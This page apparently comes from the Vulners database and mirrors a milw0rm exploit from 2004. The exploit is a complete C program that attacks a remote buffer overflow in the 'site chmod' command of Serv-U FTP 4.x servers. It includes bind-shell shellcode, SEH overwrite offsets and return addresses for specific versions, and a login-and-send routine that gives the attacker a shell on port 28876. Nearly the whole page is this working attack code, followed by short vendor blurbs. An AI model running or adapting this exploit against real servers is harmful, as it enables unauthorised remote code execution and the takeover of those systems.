Vulners
Lucene search
Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
int sock;
FILE* FILEsock;
int doubling;
void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
for (i=0; i<strlen(arguments); i++) {
send(sock, arguments+i, 1, 0);
if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
}
send(sock, "\x0a\x0d", 2, 0);
}
int main(int argc, char *argv[], char *envp[]) {
struct sockaddr_in addr;
char *outbuffer, inbuffer[256];
char *retaddress = NULL;
char *version = NULL;
if (argc<5) {
printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
exit(-1);
}
printf("- Serv-ME ----------------------------------------------------\n"
" Serv-U v4.x \"site chmod\" exploit.\n"
" Written by SkyLined <[email protected]>.\n"
" Credits for the vulnerability go to ICBM <[email protected]>.\n"
" Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("Socket creation failed");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
perror("Connection failed");
exit(-1);
}
FILEsock = fdopen(sock, "r");
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
printf("[-] This is not a Serv-U v4.X ftp server.\n");
exit(-1);
}
if (strstr(inbuffer, "v4.1") > 0) {
retaddress = retaddress_4103;
version = "4.1.0.3";
}
printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
send_command("USER", argv[3]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
send_command("PASS", argv[4]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "230") != inbuffer) {
printf("[-] Login failed.\n");
exit(-1);
}
if (argv[5]) {
printf("\n[+] Changing directory...\n");
send_command("CD", argv[5]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
}
outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
memset(outbuffer, NOP, exploit_length);
memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
printf("\n[+] Checking if \\xff doubling is nescesary: ");
send_command("SITE CHMOD 477", "-\xff\xff-");
fgets(inbuffer, sizeof inbuffer, FILEsock);
if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
doubling = 1;
printf("Yes.");
retaddress = retaddress_4004;
version = "4.0.0.4";
} else {
printf("No.");
if (retaddress==NULL) {
retaddress = retaddress_4100;
version = "4.1.0.0";
}
}
printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
version, *(int*)retaddress);
memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
printf("\n[+] Sending exploit... ");
send_command("SITE CHMOD 477", outbuffer);
printf("send, you can now try to connect to %s:28876.\n", argv[1]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
close(socket);
printf("\n[+] Done. \n");
}
// milw0rm.com [2004-01-30]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1